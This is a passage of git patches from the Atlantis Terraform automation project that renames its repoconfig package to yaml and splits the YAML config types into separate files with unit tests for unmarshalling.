-		Meta: repoconfig.StepMeta{
+	s := yaml.PlanStep{
+		Meta: yaml.StepMeta{
 			Log:                   logger,
 			Workspace:             workspace,
 			AbsolutePath:          "/path",
@@ -112,8 +112,8 @@ func TestRun_SwitchesWorkspace(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := repoconfig.PlanStep{
-				Meta: repoconfig.StepMeta{
+			s := yaml.PlanStep{
+				Meta: yaml.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
@@ -170,8 +170,8 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			terraform := mocks.NewMockClient()
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := repoconfig.PlanStep{
-				Meta: repoconfig.StepMeta{
+			s := yaml.PlanStep{
+				Meta: yaml.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
@@ -212,8 +212,8 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
 	terraform := mocks.NewMockClient()
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := repoconfig.PlanStep{
-		Meta: repoconfig.StepMeta{
+	s := yaml.PlanStep{
+		Meta: yaml.StepMeta{
 			Log:                   logger,
 			Workspace:             "workspace",
 			AbsolutePath:          "/path",
@@ -258,8 +258,8 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	// Using version >= 0.10 here so we don't expect any env commands.
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := repoconfig.PlanStep{
-		Meta: repoconfig.StepMeta{
+	s := yaml.PlanStep{
+		Meta: yaml.StepMeta{
 			Log:                   logger,
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
diff --git a/server/events/repoconfig/reader.go b/server/events/yaml/reader.go
similarity index 93%
rename from server/events/repoconfig/reader.go
rename to server/events/yaml/reader.go
index 7f2557e42d..1708e40ff9 100644
--- a/server/events/repoconfig/reader.go
+++ b/server/events/yaml/reader.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"fmt"
@@ -46,8 +46,8 @@ func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) {
 	if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil {
 		// Unmarshal error messages aren't fit for user output. We need to
 		// massage them.
-		// todo: fix "field autoplan not found in struct repoconfig.alias" errors
-		return repoConfig, errors.New(strings.Replace(err.Error(), " into repoconfig.RepoConfig", "", -1))
+		// todo: fix "field autoplan not found in struct yaml.alias" errors
+		return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.RepoConfig", "", -1))
 	}
 
 	// Validate version.
diff --git a/server/events/repoconfig/reader_test.go b/server/events/yaml/reader_test.go
similarity index 85%
rename from server/events/repoconfig/reader_test.go
rename to server/events/yaml/reader_test.go
index 02fa41b342..430b4d98d5 100644
--- a/server/events/repoconfig/reader_test.go
+++ b/server/events/yaml/reader_test.go
@@ -1,16 +1,16 @@
-package repoconfig_test
+package yaml_test
 
 import (
 	"io/ioutil"
 	"path/filepath"
 	"testing"
 
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	. "github.com/runatlantis/atlantis/testing"
 )
 
 func TestReadConfig_DirDoesNotExist(t *testing.T) {
-	r := repoconfig.Reader{}
+	r := yaml.Reader{}
 	conf, err := r.ReadConfig("/not/exist")
 	Ok(t, err)
 	Assert(t, conf == nil, "exp nil ptr")
@@ -20,7 +20,7 @@ func TestReadConfig_FileDoesNotExist(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 
-	r := repoconfig.Reader{}
+	r := yaml.Reader{}
 	conf, err := r.ReadConfig(tmpDir)
 	Ok(t, err)
 	Assert(t, conf == nil, "exp nil ptr")
@@ -32,7 +32,7 @@ func TestReadConfig_BadPermissions(t *testing.T) {
 	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
 	Ok(t, err)
 
-	r := repoconfig.Reader{}
+	r := yaml.Reader{}
 	_, err = r.ReadConfig(tmpDir)
 	ErrContains(t, "unable to read atlantis.yaml file: ", err)
 }
@@ -64,7 +64,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) {
 		t.Run(c.description, func(t *testing.T) {
 			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
 			Ok(t, err)
-			r := repoconfig.Reader{}
+			r := yaml.Reader{}
 			_, err = r.ReadConfig(tmpDir)
 			ErrEquals(t, c.expErr, err)
 		})
@@ -159,7 +159,7 @@ projects:
 version: 2
 projects:
 - unknown: value`,
-			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct repoconfig.alias",
+			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct yaml.alias",
 		},
 
 		// project workflow doesn't exist
@@ -303,6 +303,30 @@ workflows:
   default:
     plan:
       - init
+`,
+			expErr: "missing \"steps\" key",
+		},
+		{
+			description: "no value after plan:",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+`,
+			expErr: "missing \"steps\" key",
+		},
+		{
+			description: "no value after apply:",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
 `,
 			expErr: "missing \"steps\" key",
 		},
@@ -316,7 +340,7 @@ workflows:
 			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
 			Ok(t, err)
 
-			r := repoconfig.Reader{}
+			r := yaml.Reader{}
 			_, err = r.ReadConfig(tmpDir)
 			ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
 		})
@@ -324,9 +348,9 @@ workflows:
 }
 
 func TestReadConfig_Successes(t *testing.T) {
-	basicProjects := []repoconfig.Project{
+	basicProjects := []yaml.Project{
 		{
-			AutoPlan: &repoconfig.AutoPlan{
+			AutoPlan: &yaml.AutoPlan{
 				Enabled:      true,
 				WhenModified: []string{"**/*.tf"},
 			},
@@ -341,7 +365,7 @@ func TestReadConfig_Successes(t *testing.T) {
 	cases := []struct {
 		description string
 		input       string
-		expOutput   repoconfig.RepoConfig
+		expOutput   yaml.RepoConfig
 	}{
 		{
 			description: "uses project defaults",
@@ -349,7 +373,7 @@ func TestReadConfig_Successes(t *testing.T) {
 version: 2
 projects:
 - dir: "."`,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -363,7 +387,7 @@ projects:
   auto_plan:
     when_modified: ["**/*.tf"]
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -375,7 +399,7 @@ version: 2
 projects:
 - dir: "."
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -388,7 +412,7 @@ projects:
 - dir: "."
 workflows: ~
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -402,13 +426,13 @@ projects:
 workflows:
   default: ~
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
+				Workflows: map[string]yaml.Workflow{
 					"default": {
-						Plan: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Plan: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType: "init",
 								},
@@ -417,8 +441,8 @@ workflows:
 								},
 							},
 						},
-						Apply: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Apply: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType: "apply",
 								},
@@ -439,13 +463,13 @@ workflows:
     plan:
     apply:
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
+				Workflows: map[string]yaml.Workflow{
 					"default": {
-						Plan: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Plan: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType: "init",
 								},
@@ -454,8 +478,8 @@ workflows:
 								},
 							},
 						},
-						Apply: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Apply: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType: "apply",
 								},
@@ -478,15 +502,15 @@ workflows:
     apply:
       steps:
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
+				Workflows: map[string]yaml.Workflow{
 					"default": {
-						Plan: &repoconfig.Stage{
+						Plan: &yaml.Stage{
 							Steps: nil,
 						},
-						Apply: &repoconfig.Stage{
+						Apply: &yaml.Stage{
 							Steps: nil,
 						},
 					},
@@ -510,13 +534,13 @@ workflows:
       - plan # we don't validate if they make sense
       - apply
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
+				Workflows: map[string]yaml.Workflow{
 					"default": {
-						Plan: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Plan: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType: "init",
 								},
@@ -525,8 +549,8 @@ workflows:
 								},
 							},
 						},
-						Apply: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Apply: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType: "plan",
 								},
@@ -562,13 +586,13 @@ workflows:
       - apply:
           extra_args: ["a", "b"]
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
+				Workflows: map[string]yaml.Workflow{
 					"default": {
-						Plan: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Plan: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType:  "init",
 									ExtraArgs: nil,
@@ -579,8 +603,8 @@ workflows:
 								},
 							},
 						},
-						Apply: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Apply: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType:  "plan",
 									ExtraArgs: []string{"a", "b"},
@@ -610,13 +634,13 @@ workflows:
       steps:
       - run: echo apply "arg 2"
 `,
-			expOutput: repoconfig.RepoConfig{
+			expOutput: yaml.RepoConfig{
 				Version:  2,
 				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
+				Workflows: map[string]yaml.Workflow{
 					"default": {
-						Plan: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Plan: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType:  "run",
 									ExtraArgs: nil,
@@ -624,8 +648,8 @@ workflows:
 								},
 							},
 						},
-						Apply: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
+						Apply: &yaml.Stage{
+							Steps: []yaml.StepConfig{
 								{
 									StepType:  "run",
 									ExtraArgs: nil,
@@ -647,7 +671,7 @@ workflows:
 			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
 			Ok(t, err)
 
-			r := repoconfig.Reader{}
+			r := yaml.Reader{}
 			act, err := r.ReadConfig(tmpDir)
 			Ok(t, err)
 			Equals(t, &c.expOutput, act)
diff --git a/server/events/repoconfig/repoconfig.go b/server/events/yaml/repoconfig.go
similarity index 99%
rename from server/events/repoconfig/repoconfig.go
rename to server/events/yaml/repoconfig.go
index 6d71d7de0d..7af982436b 100644
--- a/server/events/repoconfig/repoconfig.go
+++ b/server/events/yaml/repoconfig.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"github.com/hashicorp/go-version"
diff --git a/server/events/repoconfig/run_step.go b/server/events/yaml/run_step.go
similarity index 97%
rename from server/events/repoconfig/run_step.go
rename to server/events/yaml/run_step.go
index 7a157bb6fb..e4794a22ce 100644
--- a/server/events/repoconfig/run_step.go
+++ b/server/events/yaml/run_step.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"fmt"
diff --git a/server/events/yaml/run_step_test.go b/server/events/yaml/run_step_test.go
new file mode 100644
index 0000000000..d00e3ec788
--- /dev/null
+++ b/server/events/yaml/run_step_test.go
@@ -0,0 +1,3 @@
+package yaml
+
+// todo
diff --git a/server/server.go b/server/server.go
index e53de94a11..9381d74690 100644
--- a/server/server.go
+++ b/server/server.go
@@ -36,11 +36,11 @@ import (
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/locking/boltdb"
 	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 	"github.com/runatlantis/atlantis/server/static"
 	"github.com/urfave/cli"
@@ -200,8 +200,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		ConfigReader: configReader,
 		Terraform:    terraformClient,
 	}
-	executionPlanner := &repoconfig.ExecutionPlanner{
-		ConfigReader:      &repoconfig.Reader{},
+	executionPlanner := &yaml.ExecutionPlanner{
+		ConfigReader:      &yaml.Reader{},
 		DefaultTFVersion:  terraformClient.Version(),
 		TerraformExecutor: terraformClient,
 	}

From b531705429ed48b698df0ba2182e7a04e017618f Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 8 Jun 2018 15:55:55 +0100
Subject: [PATCH 14/69] Split out config elements into separate files

---
 server/events/yaml/auto_plan.go        |  10 ++
 server/events/yaml/auto_plan_test.go   |  47 ++++++
 server/events/yaml/config.go           | 206 +------------------------
 server/events/yaml/config_test.go      |  74 +++++++++
 server/events/yaml/project.go          |  28 ++++
 server/events/yaml/project_test.go     |  67 ++++++++
 server/events/yaml/reader.go           |   8 +-
 server/events/yaml/reader_test.go      |  22 +--
 server/events/yaml/stage.go            |   5 +
 server/events/yaml/step_config.go      |  82 ++++++++++
 server/events/yaml/step_config_test.go | 159 +++++++++++++++++++
 server/events/yaml/workflow.go         |  60 +++++++
 server/events/yaml/workflow_test.go    | 123 +++++++++++++++
 13 files changed, 671 insertions(+), 220 deletions(-)
 create mode 100644 server/events/yaml/auto_plan.go
 create mode 100644 server/events/yaml/auto_plan_test.go
 create mode 100644 server/events/yaml/config_test.go
 create mode 100644 server/events/yaml/project.go
 create mode 100644 server/events/yaml/project_test.go
 create mode 100644 server/events/yaml/stage.go
 create mode 100644 server/events/yaml/step_config.go
 create mode 100644 server/events/yaml/step_config_test.go
 create mode 100644 server/events/yaml/workflow.go
 create mode 100644 server/events/yaml/workflow_test.go

diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go
new file mode 100644
index 0000000000..16bcb80f5b
--- /dev/null
+++ b/server/events/yaml/auto_plan.go
@@ -0,0 +1,10 @@
+package yaml
+
+type AutoPlan struct {
+	WhenModified []string `yaml:"when_modified"`
+	Enabled      bool     `yaml:"enabled"`
+}
+
+// NOTE: AutoPlan does not implement UnmarshalYAML because we are unable to set
+// defaults for bool and []string fields and so we just use the normal yaml
+// unmarshalling.
diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go
new file mode 100644
index 0000000000..2dd8a43ef9
--- /dev/null
+++ b/server/events/yaml/auto_plan_test.go
@@ -0,0 +1,47 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestAutoPlan_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.AutoPlan
+	}{
+		{
+			description: "should use defaults",
+			input: `
+`,
+			exp: yaml.AutoPlan{
+				Enabled:      false,
+				WhenModified: nil,
+			},
+		},
+		{
+			description: "should use all set fields",
+			input: `
+enabled: true
+when_modified: ["something-else"]
+`,
+			exp: yaml.AutoPlan{
+				Enabled:      true,
+				WhenModified: []string{"something-else"},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var a yaml.AutoPlan
+			err := yamlv2.Unmarshal([]byte(c.input), &a)
+			Ok(t, err)
+			Equals(t, c.exp, a)
+		})
+	}
+}
diff --git a/server/events/yaml/config.go b/server/events/yaml/config.go
index 3fffcf0135..cd8c4f26eb 100644
--- a/server/events/yaml/config.go
+++ b/server/events/yaml/config.go
@@ -1,211 +1,7 @@
 package yaml
 
-import (
-	"fmt"
-
-	"github.com/flynn-archive/go-shlex"
-	"github.com/pkg/errors"
-)
-
-type RepoConfig struct {
+type Config struct {
 	Version   int                 `yaml:"version"`
 	Projects  []Project           `yaml:"projects"`
 	Workflows map[string]Workflow `yaml:"workflows"`
 }
-
-type Project struct {
-	Dir               string    `yaml:"dir"`
-	Workspace         string    `yaml:"workspace"`
-	Workflow          string    `yaml:"workflow"`
-	TerraformVersion  string    `yaml:"terraform_version"`
-	AutoPlan          *AutoPlan `yaml:"auto_plan,omitempty"`
-	ApplyRequirements []string  `yaml:"apply_requirements"`
-}
-
-func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// Use a type alias so unmarshal doesn't get into an infinite loop.
-	type alias Project
-	// Set up defaults.
-	defaults := alias{
-		Workspace: defaultWorkspace,
-		AutoPlan: &AutoPlan{
-			Enabled:      true,
-			WhenModified: []string{"**/*.tf"},
-		},
-	}
-	if err := unmarshal(&defaults); err != nil {
-		return err
-	}
-	*p = Project(defaults)
-	return nil
-}
-
-type AutoPlan struct {
-	WhenModified []string `yaml:"when_modified"`
-	Enabled      bool     `yaml:"enabled"` // defaults to true
-}
-
-func (a *AutoPlan) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// Use a type alias so unmarshal doesn't get into an infinite loop.
-	type alias AutoPlan
-	// Set up defaults.
-	defaults := alias{
-		// If not specified, we assume it's enabled.
-		Enabled: true,
-	}
-	if err := unmarshal(&defaults); err != nil {
-		return err
-	}
-	*a = AutoPlan(defaults)
-	return nil
-}
-
-type Workflow struct {
-	Apply *Stage `yaml:"apply"` // defaults to regular apply steps
-	Plan  *Stage `yaml:"plan"`  // defaults to regular plan steps
-}
-
-func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// Check if they forgot to set the "steps" key.
-	type MissingSteps struct {
-		Apply []interface{}
-		Plan  []interface{}
-	}
-	var missingSteps MissingSteps
-	if err := unmarshal(&missingSteps); err == nil {
-		return errors.New("missing \"steps\" key")
-	}
-
-	// Use a type alias so unmarshal doesn't get into an infinite loop.
-	type alias Workflow
-	var tmp alias
-	if err := unmarshal(&tmp); err != nil {
-		return err
-	}
-	*p = Workflow(tmp)
-
-	// If plan or apply keys aren't specified we use the default workflow.
-	if p.Apply == nil {
-		p.Apply = &Stage{
-			[]StepConfig{
-				{
-					StepType: "apply",
-				},
-			},
-		}
-	}
-
-	if p.Plan == nil {
-		p.Plan = &Stage{
-			[]StepConfig{
-				{
-					StepType: "init",
-				},
-				{
-					StepType: "plan",
-				},
-			},
-		}
-	}
-
-	return nil
-}
-
-type Stage struct {
-	Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi'
-}
-
-type StepConfig struct {
-	StepType  string
-	ExtraArgs []string
-	// Run will be set if the StepType is "run". This is for custom commands.
-	// Ex. if the key is `run: echo hi` then Run will be "echo hi".
-	Run []string
-}
-
-func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// First try to unmarshal as a single string, ex.
-	// steps:
-	// - init
-	// - plan
-	var singleString string
-	err := unmarshal(&singleString)
-	if err == nil {
-		if singleString != "init" && singleString != "plan" && singleString != "apply" {
-			return fmt.Errorf("unsupported step type: %q", singleString)
-		}
-		s.StepType = singleString
-		return nil
-	}
-
-	// Next, try to unmarshal as a built-in command with extra_args set, ex.
-	// steps:
-	// - init:
-	///    extra_args: ["arg1"]
-	//
-	// We need to create a struct for each step so go-yaml knows to call into
-	// our routine based on the key (ex. init, plan, etc).
-	// We use a map[string]interface{} as the value so we can manually
-	// validate key names and return better errors. This is instead of:
-	//    Init struct{
-	//    	ExtraArgs []string `yaml:"extra_args"`
-	//    } `yaml:"init"`
-
-	validateBuiltIn := func(stepType string, args map[string]interface{}) error {
-		s.StepType = stepType
-		for k, v := range args {
-			if k != "extra_args" {
-				return fmt.Errorf("unsupported key %q for step %s – the only supported key is extra_args", k, stepType)
-			}
-
-			// parse as []string
-			val, ok := v.([]interface{})
-			if !ok {
-				return fmt.Errorf("expected array of strings as value of extra_args, not %q", v)
-			}
-			var finalVals []string
-			for _, i := range val {
-				finalVals = append(finalVals, fmt.Sprintf("%s", i))
-			}
-			s.ExtraArgs = finalVals
-		}
-		return nil
-	}
-	var initStep struct {
-		Init map[string]interface{} `yaml:"init"`
-	}
-	if err = unmarshal(&initStep); err == nil {
-		return validateBuiltIn("init", initStep.Init)
-	}
-
-	var planStep struct {
-		Plan map[string]interface{} `yaml:"plan"`
-	}
-	if err = unmarshal(&planStep); err == nil {
-		return validateBuiltIn("plan", planStep.Plan)
-	}
-
-	var applyStep struct {
-		Apply map[string]interface{} `yaml:"apply"`
-	}
-	if err = unmarshal(&applyStep); err == nil {
-		return validateBuiltIn("apply", applyStep.Apply)
-	}
-
-	// Try to unmarshal as a custom run step, ex.
-	// steps:
-	// - run: my command
-	var runStep struct {
-		Run string `yaml:"run"`
-	}
-	if err = unmarshal(&runStep); err == nil {
-		s.StepType = "run"
-		parts, err := shlex.Split(runStep.Run)
-		if err != nil {
-			return err
-		}
-		s.Run = parts
-	}
-
-	return err
-}
diff --git a/server/events/yaml/config_test.go b/server/events/yaml/config_test.go
new file mode 100644
index 0000000000..df4bc9c541
--- /dev/null
+++ b/server/events/yaml/config_test.go
@@ -0,0 +1,74 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestConfig_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.Config
+	}{
+		{
+			description: "should be empty if nothing set",
+			input:       `~`,
+			exp: yaml.Config{
+				Version:   0,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "should use values if set",
+			input: `
+version: 2
+projects:
+- dir: mydir
+  workspace: myworkspace
+  workflow: default
+workflows:
+  default:
+    plan:
+      steps: []
+    apply:
+     steps: []`,
+			exp: yaml.Config{
+				Version: 2,
+				Projects: []yaml.Project{
+					{
+						Dir:       "mydir",
+						Workflow:  "default",
+						Workspace: "myworkspace",
+						AutoPlan: &yaml.AutoPlan{
+							WhenModified: []string{"**/*.tf"},
+							Enabled:      true,
+						},
+					},
+				},
+				Workflows: map[string]yaml.Workflow{
+					"default": {
+						Apply: &yaml.Stage{
+							Steps: []yaml.StepConfig{},
+						},
+						Plan: &yaml.Stage{
+							Steps: []yaml.StepConfig{},
+						},
+					},
+				},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var conf yaml.Config
+			err := yamlv2.Unmarshal([]byte(c.input), &conf)
+			Ok(t, err)
+			Equals(t, c.exp, conf)
+		})
+	}
+}
diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go
new file mode 100644
index 0000000000..b2c136e59d
--- /dev/null
+++ b/server/events/yaml/project.go
@@ -0,0 +1,28 @@
+package yaml
+
+type Project struct {
+	Dir               string    `yaml:"dir"`
+	Workspace         string    `yaml:"workspace"`
+	Workflow          string    `yaml:"workflow"`
+	TerraformVersion  string    `yaml:"terraform_version"`
+	AutoPlan          *AutoPlan `yaml:"auto_plan,omitempty"`
+	ApplyRequirements []string  `yaml:"apply_requirements"`
+}
+
+func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// Use a type alias so unmarshal doesn't get into an infinite loop.
+	type alias Project
+	// Set up defaults.
+	defaults := alias{
+		Workspace: defaultWorkspace,
+		AutoPlan: &AutoPlan{
+			Enabled:      true,
+			WhenModified: []string{"**/*.tf"},
+		},
+	}
+	if err := unmarshal(&defaults); err != nil {
+		return err
+	}
+	*p = Project(defaults)
+	return nil
+}
diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go
new file mode 100644
index 0000000000..c3ab94d1db
--- /dev/null
+++ b/server/events/yaml/project_test.go
@@ -0,0 +1,67 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestProject_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.Project
+	}{
+		{
+			description: "should use defaults",
+			input: `
+dir: .`,
+			exp: yaml.Project{
+				Dir:              ".",
+				Workspace:        "default",
+				Workflow:         "",
+				TerraformVersion: "",
+				AutoPlan: &yaml.AutoPlan{
+					WhenModified: []string{"**/*.tf"},
+					Enabled:      true,
+				},
+				ApplyRequirements: nil,
+			},
+		},
+		{
+			description: "should use all set fields",
+			input: `
+dir: mydir
+workspace: workspace
+workflow: workflow
+terraform_version: v0.11.0
+auto_plan:
+  when_modified: []
+  enabled: false
+apply_requirements:
+- mergeable`,
+			exp: yaml.Project{
+				Dir:              "mydir",
+				Workspace:        "workspace",
+				Workflow:         "workflow",
+				TerraformVersion: "v0.11.0",
+				AutoPlan: &yaml.AutoPlan{
+					WhenModified: []string{},
+					Enabled:      false,
+				},
+				ApplyRequirements: []string{"mergeable"},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var p yaml.Project
+			err := yamlv2.Unmarshal([]byte(c.input), &p)
+			Ok(t, err)
+			Equals(t, c.exp, p)
+		})
+	}
+}
diff --git a/server/events/yaml/reader.go b/server/events/yaml/reader.go
index 1708e40ff9..eaea835393 100644
--- a/server/events/yaml/reader.go
+++ b/server/events/yaml/reader.go
@@ -19,7 +19,7 @@ type Reader struct{}
 
 // ReadConfig returns the parsed and validated config for repoDir.
 // If there was no config, it returns a nil pointer.
-func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) {
+func (r *Reader) ReadConfig(repoDir string) (*Config, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
 
@@ -41,13 +41,13 @@ func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) {
 	return &config, err
 }
 
-func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) {
-	var repoConfig RepoConfig
+func (r *Reader) parseAndValidate(configData []byte) (Config, error) {
+	var repoConfig Config
 	if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil {
 		// Unmarshal error messages aren't fit for user output. We need to
 		// massage them.
 		// todo: fix "field autoplan not found in struct yaml.alias" errors
-		return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.RepoConfig", "", -1))
+		return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.Config", "", -1))
 	}
 
 	// Validate version.
diff --git a/server/events/yaml/reader_test.go b/server/events/yaml/reader_test.go
index 430b4d98d5..7dc4b25b4c 100644
--- a/server/events/yaml/reader_test.go
+++ b/server/events/yaml/reader_test.go
@@ -365,7 +365,7 @@ func TestReadConfig_Successes(t *testing.T) {
 	cases := []struct {
 		description string
 		input       string
-		expOutput   yaml.RepoConfig
+		expOutput   yaml.Config
 	}{
 		{
 			description: "uses project defaults",
@@ -373,7 +373,7 @@ func TestReadConfig_Successes(t *testing.T) {
 version: 2
 projects:
 - dir: "."`,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -387,7 +387,7 @@ projects:
   auto_plan:
     when_modified: ["**/*.tf"]
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -399,7 +399,7 @@ version: 2
 projects:
 - dir: "."
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -412,7 +412,7 @@ projects:
 - dir: "."
 workflows: ~
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 			},
@@ -426,7 +426,7 @@ projects:
 workflows:
   default: ~
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]yaml.Workflow{
@@ -463,7 +463,7 @@ workflows:
     plan:
     apply:
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]yaml.Workflow{
